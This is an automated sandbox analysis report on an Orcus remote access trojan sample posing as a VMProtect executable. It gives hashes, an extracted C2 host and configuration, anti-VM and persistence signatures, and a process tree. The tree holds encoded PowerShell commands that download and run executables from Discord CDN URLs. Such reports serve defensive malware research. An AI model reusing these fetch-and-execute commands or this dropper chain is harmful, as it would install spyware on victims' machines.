orcus | 82ac2d2af9a3c49885e2f31845a122113c914565c93f2fc6743397a8bb14a185

Analysis

max time kernel
149s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
12/07/2023, 10:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

vmprotect.vmp.exe
Size

16.8MB
MD5

b4b629b3969203203accb2f961008eda
SHA1

d46c88e5026389792030a5a7e6235ff6623ea65a
SHA256

82ac2d2af9a3c49885e2f31845a122113c914565c93f2fc6743397a8bb14a185
SHA512

9e8924ff17bad852de54f76104ea9f2816a1547af38e0f5208f2f0c7a4b3962a610c78c29b30670160396b8ed8571bf859ec974ecf43e0b7d171560653d8982f
SSDEEP

196608:AqAvdSSgRmNfKgTngXpEN5o9P34724NE3pB2qY0nuddervStDbIqJICAtCEHx0eC:APkSNPTnWEvo9Py5u9lQeAbuZCER0dX

Score

10^/10

orcus evasion rat spyware stealer trojan upx

Malware Config

Extracted

Family

orcus

increased-religious.at.ply.gg:58082

Mutex

c79251c991194aaa8316dab2df886a8b

Attributes

autostart_method
TaskScheduler
enable_keylogger
false
install_path
%programfiles%\Orcus\Orcus.exe
reconnect_delay
10000
registry_keyname
Orcus
taskscheduler_taskname
Orcus
watchdog_path
AppData\BossWatchdog.exe

Signatures

Orcus
Orcus is a Remote Access Trojan that is being sold on underground forums.
rat spyware stealer orcus

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

description	pid	Process	procid_target
PID 4400 created 3128	4400	ntoskrln.exe	51
PID 4400 created 3128	4400	ntoskrln.exe	51
PID 4936 created 3128	4936	RuntimeBroker.exe	51
PID 4936 created 3128	4936	RuntimeBroker.exe	51
PID 1544 created 3128	1544	updater.exe	51

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	vmprotect.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	themka_protected.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	WinRAR.exe

Orcurs Rat Executable 1 IoCs

resource	yara_rule
behavioral2/memory/3816-528-0x0000000000CF0000-0x0000000002416000-memory.dmp	orcus

Blocklisted process makes network request 4 IoCs

flow	pid	Process
21	768	powershell.exe
53	960	powershell.exe
54	4120	powershell.exe
55	1328	powershell.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	themka_protected.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	themka_protected.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WinRAR.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WinRAR.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	vmprotect.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	vmprotect.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Control Panel\International\Geo\Nation	themida.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Control Panel\International\Geo\Nation	done.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Control Panel\International\Geo\Nation	WinRAR.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Control Panel\International\Geo\Nation	vmprotect.vmp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Control Panel\International\Geo\Nation	vmprotect.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Control Panel\International\Geo\Nation	VACBAN.VMP.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Control Panel\International\Geo\Nation	vacban.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Control Panel\International\Geo\Nation	themka_protected.exe

Executes dropped EXE 13 IoCs

pid	Process
1160	vmprotect.exe
3532	VACBAN.VMP.EXE
2256	vacban.exe
3656	themka_protected.exe
4896	themida.exe
1208	done.exe
2072	Built.exe
2476	Built.exe
4400	ntoskrln.exe
3816	WinRAR.exe
4936	RuntimeBroker.exe
1544	updater.exe
4796	Orcus.exe

Loads dropped DLL 17 IoCs

pid	Process
2476	Built.exe
2476	Built.exe
2476	Built.exe
2476	Built.exe
2476	Built.exe
2476	Built.exe
2476	Built.exe
2476	Built.exe
2476	Built.exe
2476	Built.exe
2476	Built.exe
2476	Built.exe
2476	Built.exe
2476	Built.exe
2476	Built.exe
2476	Built.exe
2476	Built.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000600000002321f-322.dat	upx
behavioral2/files/0x000600000002321f-323.dat	upx
behavioral2/memory/2476-326-0x00007FFE36C40000-0x00007FFE37228000-memory.dmp	upx
behavioral2/files/0x0006000000023223-332.dat	upx
behavioral2/files/0x000600000002321d-338.dat	upx
behavioral2/files/0x0006000000023217-345.dat	upx
behavioral2/files/0x000600000002321a-351.dat	upx
behavioral2/files/0x0006000000023222-354.dat	upx
behavioral2/files/0x0006000000023222-355.dat	upx
behavioral2/files/0x000600000002321a-353.dat	upx
behavioral2/files/0x000600000002321b-360.dat	upx
behavioral2/files/0x000600000002321e-365.dat	upx
behavioral2/files/0x000600000002321e-364.dat	upx
behavioral2/files/0x000600000002321c-363.dat	upx
behavioral2/files/0x0006000000023216-367.dat	upx
behavioral2/files/0x0006000000023218-368.dat	upx
behavioral2/memory/2476-376-0x00007FFE51D10000-0x00007FFE51D20000-memory.dmp	upx
behavioral2/memory/2476-378-0x00007FFE4A690000-0x00007FFE4A6B4000-memory.dmp	upx
behavioral2/memory/2476-381-0x00007FFE482F0000-0x00007FFE4831D000-memory.dmp	upx
behavioral2/memory/2476-379-0x00007FFE50570000-0x00007FFE5057F000-memory.dmp	upx
behavioral2/memory/2476-385-0x00007FFE4BD70000-0x00007FFE4BD89000-memory.dmp	upx
behavioral2/files/0x0006000000023224-377.dat	upx
behavioral2/memory/2476-386-0x00007FFE42B50000-0x00007FFE42B73000-memory.dmp	upx
behavioral2/memory/2476-388-0x00007FFE36AC0000-0x00007FFE36C33000-memory.dmp	upx
behavioral2/memory/2476-389-0x00007FFE4B800000-0x00007FFE4B819000-memory.dmp	upx
behavioral2/memory/2476-390-0x00007FFE50100000-0x00007FFE5010D000-memory.dmp	upx
behavioral2/files/0x0006000000023224-374.dat	upx
behavioral2/memory/2476-391-0x00007FFE427A0000-0x00007FFE427CE000-memory.dmp	upx
behavioral2/memory/2476-392-0x00007FFE36740000-0x00007FFE36AB5000-memory.dmp	upx
behavioral2/memory/2476-394-0x00007FFE4A470000-0x00007FFE4A484000-memory.dmp	upx
behavioral2/memory/2476-393-0x00007FFE365C0000-0x00007FFE36678000-memory.dmp	upx
behavioral2/files/0x0006000000023218-369.dat	upx
behavioral2/files/0x0006000000023216-366.dat	upx
behavioral2/files/0x000600000002321c-362.dat	upx
behavioral2/files/0x000600000002321b-361.dat	upx
behavioral2/files/0x0006000000023221-359.dat	upx
behavioral2/files/0x0006000000023221-358.dat	upx
behavioral2/files/0x0006000000023219-357.dat	upx
behavioral2/files/0x0006000000023219-356.dat	upx
behavioral2/files/0x0006000000023213-350.dat	upx
behavioral2/files/0x0006000000023213-348.dat	upx
behavioral2/files/0x0006000000023217-344.dat	upx
behavioral2/files/0x000600000002321d-337.dat	upx
behavioral2/files/0x0006000000023214-336.dat	upx
behavioral2/files/0x0006000000023214-335.dat	upx
behavioral2/files/0x0006000000023223-334.dat	upx
behavioral2/memory/2476-396-0x00007FFE4C6A0000-0x00007FFE4C6AD000-memory.dmp	upx
behavioral2/memory/2476-399-0x00007FFE364A0000-0x00007FFE365BC000-memory.dmp	upx
behavioral2/memory/2476-401-0x00007FFE36C40000-0x00007FFE37228000-memory.dmp	upx
behavioral2/memory/2476-427-0x00007FFE36C40000-0x00007FFE37228000-memory.dmp	upx
behavioral2/memory/2476-428-0x00007FFE51D10000-0x00007FFE51D20000-memory.dmp	upx
behavioral2/memory/2476-429-0x00007FFE4A690000-0x00007FFE4A6B4000-memory.dmp	upx
behavioral2/memory/2476-430-0x00007FFE50570000-0x00007FFE5057F000-memory.dmp	upx
behavioral2/memory/2476-435-0x00007FFE482F0000-0x00007FFE4831D000-memory.dmp	upx
behavioral2/memory/2476-437-0x00007FFE4BD70000-0x00007FFE4BD89000-memory.dmp	upx
behavioral2/memory/2476-439-0x00007FFE42B50000-0x00007FFE42B73000-memory.dmp	upx
behavioral2/memory/2476-440-0x00007FFE36AC0000-0x00007FFE36C33000-memory.dmp	upx
behavioral2/memory/2476-443-0x00007FFE4B800000-0x00007FFE4B819000-memory.dmp	upx
behavioral2/memory/2476-445-0x00007FFE50100000-0x00007FFE5010D000-memory.dmp	upx
behavioral2/memory/2476-448-0x00007FFE36740000-0x00007FFE36AB5000-memory.dmp	upx
behavioral2/memory/2476-447-0x00007FFE427A0000-0x00007FFE427CE000-memory.dmp	upx
behavioral2/memory/2476-450-0x00007FFE4A470000-0x00007FFE4A484000-memory.dmp	upx
behavioral2/memory/2476-451-0x00007FFE4C6A0000-0x00007FFE4C6AD000-memory.dmp	upx
behavioral2/memory/2476-452-0x00007FFE364A0000-0x00007FFE365BC000-memory.dmp	upx

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	WinRAR.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	vmprotect.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	themka_protected.exe

Drops desktop.ini file(s) 2 IoCs

description	ioc	Process
File created	C:\Windows\assembly\Desktop.ini	WinRAR.exe
File opened for modification	C:\Windows\assembly\Desktop.ini	WinRAR.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs

pid	Process
1692	vmprotect.vmp.exe
1692	vmprotect.vmp.exe
1160	vmprotect.exe
3532	VACBAN.VMP.EXE
3532	VACBAN.VMP.EXE
2256	vacban.exe
2256	vacban.exe
3656	themka_protected.exe
1208	done.exe
1208	done.exe
4400	ntoskrln.exe
4400	ntoskrln.exe
4936	RuntimeBroker.exe
4936	RuntimeBroker.exe
1544	updater.exe
1544	updater.exe
3816	WinRAR.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Orcus\Orcus.exe	WinRAR.exe
File created	C:\Program Files (x86)\Orcus\Orcus.exe.config	WinRAR.exe
File opened for modification	C:\Program Files (x86)\Orcus\Orcus.exe	WinRAR.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\assembly	WinRAR.exe
File created	C:\Windows\assembly\Desktop.ini	WinRAR.exe
File opened for modification	C:\Windows\assembly\Desktop.ini	WinRAR.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
216	tasklist.exe

Suspicious behavior: EnumeratesProcesses 40 IoCs

pid	Process
1692	vmprotect.vmp.exe
1692	vmprotect.vmp.exe
768	powershell.exe
768	powershell.exe
3532	VACBAN.VMP.EXE
3532	VACBAN.VMP.EXE
960	powershell.exe
960	powershell.exe
2256	vacban.exe
2256	vacban.exe
4120	powershell.exe
4120	powershell.exe
1328	powershell.exe
1328	powershell.exe
4400	ntoskrln.exe
4400	ntoskrln.exe
4936	RuntimeBroker.exe
4936	RuntimeBroker.exe
1884	powershell.exe
2256	powershell.exe
2256	powershell.exe
1884	powershell.exe
4400	ntoskrln.exe
4400	ntoskrln.exe
4972	powershell.exe
4972	powershell.exe
4400	ntoskrln.exe
4400	ntoskrln.exe
4936	RuntimeBroker.exe
4936	RuntimeBroker.exe
2220	powershell.exe
2220	powershell.exe
4936	RuntimeBroker.exe
4936	RuntimeBroker.exe
1544	updater.exe
1544	updater.exe
1544	updater.exe
1544	updater.exe
1932	powershell.exe
1932	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	768	powershell.exe
Token: SeDebugPrivilege	960	powershell.exe
Token: SeDebugPrivilege	4120	powershell.exe
Token: SeDebugPrivilege	4896	themida.exe
Token: SeDebugPrivilege	1208	done.exe
Token: SeDebugPrivilege	1328	powershell.exe
Token: SeDebugPrivilege	216	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3560	WMIC.exe
Token: SeSecurityPrivilege	3560	WMIC.exe
Token: SeTakeOwnershipPrivilege	3560	WMIC.exe
Token: SeLoadDriverPrivilege	3560	WMIC.exe
Token: SeSystemProfilePrivilege	3560	WMIC.exe
Token: SeSystemtimePrivilege	3560	WMIC.exe
Token: SeProfSingleProcessPrivilege	3560	WMIC.exe
Token: SeIncBasePriorityPrivilege	3560	WMIC.exe
Token: SeCreatePagefilePrivilege	3560	WMIC.exe
Token: SeBackupPrivilege	3560	WMIC.exe
Token: SeRestorePrivilege	3560	WMIC.exe
Token: SeShutdownPrivilege	3560	WMIC.exe
Token: SeDebugPrivilege	3560	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3560	WMIC.exe
Token: SeRemoteShutdownPrivilege	3560	WMIC.exe
Token: SeUndockPrivilege	3560	WMIC.exe
Token: SeManageVolumePrivilege	3560	WMIC.exe
Token: 33	3560	WMIC.exe
Token: 34	3560	WMIC.exe
Token: 35	3560	WMIC.exe
Token: 36	3560	WMIC.exe
Token: SeDebugPrivilege	1884	powershell.exe
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeIncreaseQuotaPrivilege	3560	WMIC.exe
Token: SeSecurityPrivilege	3560	WMIC.exe
Token: SeTakeOwnershipPrivilege	3560	WMIC.exe
Token: SeLoadDriverPrivilege	3560	WMIC.exe
Token: SeSystemProfilePrivilege	3560	WMIC.exe
Token: SeSystemtimePrivilege	3560	WMIC.exe
Token: SeProfSingleProcessPrivilege	3560	WMIC.exe
Token: SeIncBasePriorityPrivilege	3560	WMIC.exe
Token: SeCreatePagefilePrivilege	3560	WMIC.exe
Token: SeBackupPrivilege	3560	WMIC.exe
Token: SeRestorePrivilege	3560	WMIC.exe
Token: SeShutdownPrivilege	3560	WMIC.exe
Token: SeDebugPrivilege	3560	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3560	WMIC.exe
Token: SeRemoteShutdownPrivilege	3560	WMIC.exe
Token: SeUndockPrivilege	3560	WMIC.exe
Token: SeManageVolumePrivilege	3560	WMIC.exe
Token: 33	3560	WMIC.exe
Token: 34	3560	WMIC.exe
Token: 35	3560	WMIC.exe
Token: 36	3560	WMIC.exe
Token: SeDebugPrivilege	4972	powershell.exe
Token: SeIncreaseQuotaPrivilege	4972	powershell.exe
Token: SeSecurityPrivilege	4972	powershell.exe
Token: SeTakeOwnershipPrivilege	4972	powershell.exe
Token: SeLoadDriverPrivilege	4972	powershell.exe
Token: SeSystemProfilePrivilege	4972	powershell.exe
Token: SeSystemtimePrivilege	4972	powershell.exe
Token: SeProfSingleProcessPrivilege	4972	powershell.exe
Token: SeIncBasePriorityPrivilege	4972	powershell.exe
Token: SeCreatePagefilePrivilege	4972	powershell.exe
Token: SeBackupPrivilege	4972	powershell.exe
Token: SeRestorePrivilege	4972	powershell.exe
Token: SeShutdownPrivilege	4972	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1692 wrote to memory of 768	1692	vmprotect.vmp.exe	91
PID 1692 wrote to memory of 768	1692	vmprotect.vmp.exe	91
PID 1692 wrote to memory of 768	1692	vmprotect.vmp.exe	91
PID 768 wrote to memory of 1160	768	powershell.exe	97
PID 768 wrote to memory of 1160	768	powershell.exe	97
PID 768 wrote to memory of 1160	768	powershell.exe	97
PID 1160 wrote to memory of 3532	1160	vmprotect.exe	101
PID 1160 wrote to memory of 3532	1160	vmprotect.exe	101
PID 1160 wrote to memory of 3532	1160	vmprotect.exe	101
PID 3532 wrote to memory of 960	3532	VACBAN.VMP.EXE	102
PID 3532 wrote to memory of 960	3532	VACBAN.VMP.EXE	102
PID 3532 wrote to memory of 960	3532	VACBAN.VMP.EXE	102
PID 960 wrote to memory of 2256	960	powershell.exe	104
PID 960 wrote to memory of 2256	960	powershell.exe	104
PID 960 wrote to memory of 2256	960	powershell.exe	104
PID 2256 wrote to memory of 3656	2256	vacban.exe	105
PID 2256 wrote to memory of 3656	2256	vacban.exe	105
PID 2256 wrote to memory of 3656	2256	vacban.exe	105
PID 3656 wrote to memory of 4120	3656	themka_protected.exe	106
PID 3656 wrote to memory of 4120	3656	themka_protected.exe	106
PID 3656 wrote to memory of 4120	3656	themka_protected.exe	106
PID 4120 wrote to memory of 4896	4120	powershell.exe	108
PID 4120 wrote to memory of 4896	4120	powershell.exe	108
PID 4120 wrote to memory of 4896	4120	powershell.exe	108
PID 4896 wrote to memory of 1208	4896	themida.exe	109
PID 4896 wrote to memory of 1208	4896	themida.exe	109
PID 1208 wrote to memory of 1328	1208	done.exe	110
PID 1208 wrote to memory of 1328	1208	done.exe	110
PID 1328 wrote to memory of 2072	1328	powershell.exe	112
PID 1328 wrote to memory of 2072	1328	powershell.exe	112
PID 2072 wrote to memory of 2476	2072	Built.exe	114
PID 2072 wrote to memory of 2476	2072	Built.exe	114
PID 1328 wrote to memory of 4400	1328	powershell.exe	113
PID 1328 wrote to memory of 4400	1328	powershell.exe	113
PID 1328 wrote to memory of 3816	1328	powershell.exe	124
PID 1328 wrote to memory of 3816	1328	powershell.exe	124
PID 1328 wrote to memory of 3816	1328	powershell.exe	124
PID 2476 wrote to memory of 4264	2476	Built.exe	123
PID 2476 wrote to memory of 4264	2476	Built.exe	123
PID 2476 wrote to memory of 4608	2476	Built.exe	122
PID 2476 wrote to memory of 4608	2476	Built.exe	122
PID 2476 wrote to memory of 3940	2476	Built.exe	115
PID 2476 wrote to memory of 3940	2476	Built.exe	115
PID 1328 wrote to memory of 4936	1328	powershell.exe	121
PID 1328 wrote to memory of 4936	1328	powershell.exe	121
PID 2476 wrote to memory of 1676	2476	Built.exe	118
PID 2476 wrote to memory of 1676	2476	Built.exe	118
PID 3940 wrote to memory of 216	3940	cmd.exe	125
PID 3940 wrote to memory of 216	3940	cmd.exe	125
PID 1676 wrote to memory of 3560	1676	cmd.exe	126
PID 1676 wrote to memory of 3560	1676	cmd.exe	126
PID 4264 wrote to memory of 1884	4264	cmd.exe	127
PID 4264 wrote to memory of 1884	4264	cmd.exe	127
PID 4608 wrote to memory of 2256	4608	cmd.exe	128
PID 4608 wrote to memory of 2256	4608	cmd.exe	128
PID 3816 wrote to memory of 3080	3816	WinRAR.exe	138
PID 3816 wrote to memory of 3080	3816	WinRAR.exe	138
PID 3816 wrote to memory of 3080	3816	WinRAR.exe	138
PID 3080 wrote to memory of 5104	3080	csc.exe	140
PID 3080 wrote to memory of 5104	3080	csc.exe	140
PID 3080 wrote to memory of 5104	3080	csc.exe	140
PID 3816 wrote to memory of 4796	3816	WinRAR.exe	141
PID 3816 wrote to memory of 4796	3816	WinRAR.exe	141
PID 3816 wrote to memory of 4796	3816	WinRAR.exe	141

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3128
- C:\Users\Admin\AppData\Local\Temp\vmprotect.vmp.exe
  "C:\Users\Admin\AppData\Local\Temp\vmprotect.vmp.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1692
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAxADIANwA5ADkANAA2ADMAOQAyADkANQA3ADIAMQA1ADgANAAvADEAMQAyADgAMwA5ADUAMgAzADMAMAA2ADgAMAA3ADcAMgA2ADcALwBwAGEAYwBrAGUAZABfAHAAcgBvAHQAZQBjAHQAZQBkAC4AZQB4AGUAJwAsACAAPAAjAGUAZwBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcgB6AGIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcgB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdgBtAHAAcgBvAHQAZQBjAHQALgBlAHgAZQAnACkAKQA8ACMAYgBxAGEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABhAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHUAdQBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHYAbQBwAHIAbwB0AGUAYwB0AC4AZQB4AGUAJwApADwAIwBqAGUAaAAjAD4A"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:768
  - - C:\Users\Admin\AppData\Roaming\vmprotect.exe
      "C:\Users\Admin\AppData\Roaming\vmprotect.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of WriteProcessMemory
      PID:1160
    - - C:\Users\Admin\AppData\Local\Temp\VACBAN.VMP.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\VACBAN.VMP.EXE"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3532
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAxADIANwA5ADkANAA2ADMAOQAyADkANQA3ADIAMQA1ADgANAAvADEAMQAyADgAMwAzADAAMgAzADgAMwAyADIAMAAyADQANQAzADEALwB4AHgAeAAuAHYAbQBwAC4AZQB4AGUAJwAsACAAPAAjAHYAcABwACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZQBhAGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYgBuAG0AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdgBhAGMAYgBhAG4ALgBlAHgAZQAnACkAKQA8ACMAbQB2AGEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgB6AGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHYAYQBjAGIAYQBuAC4AZQB4AGUAJwApADwAIwB6AGEAYwAjAD4A"
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:960
        
        C:\Users\Admin\AppData\Local\Temp\vacban.exe
        
        "C:\Users\Admin\AppData\Local\Temp\vacban.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2256
        
        C:\Users\Admin\AppData\Local\Temp\themka_protected.exe
        
        "C:\Users\Admin\AppData\Local\Temp\themka_protected.exe"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of WriteProcessMemory
        
        PID:3656
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAxADIANwA5ADkANAA2ADMAOQAyADkANQA3ADIAMQA1ADgANAAvADEAMQAyADgAMwAyADUAMwA5ADEAMQA0ADUAMgAzADgANgAwADEALwBiAG8AcwBzAC4AZQB4AGUAJwAsACAAPAAjAHUAcQBuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcABqAHEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABiAG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdABoAGUAbQBpAGQAYQAuAGUAeABlACcAKQApADwAIwBuAHYAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGwAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZQBnAG0AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdABoAGUAbQBpAGQAYQAuAGUAeABlACcAKQA8ACMAaABiAGIAIwA+AA=="
        9⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4120
        
        C:\Users\Admin\AppData\Local\Temp\themida.exe
        
        "C:\Users\Admin\AppData\Local\Temp\themida.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4896
        
        C:\Users\Admin\AppData\Local\Temp\done.exe
        
        "C:\Users\Admin\AppData\Local\Temp\done.exe"
        11⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1208
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
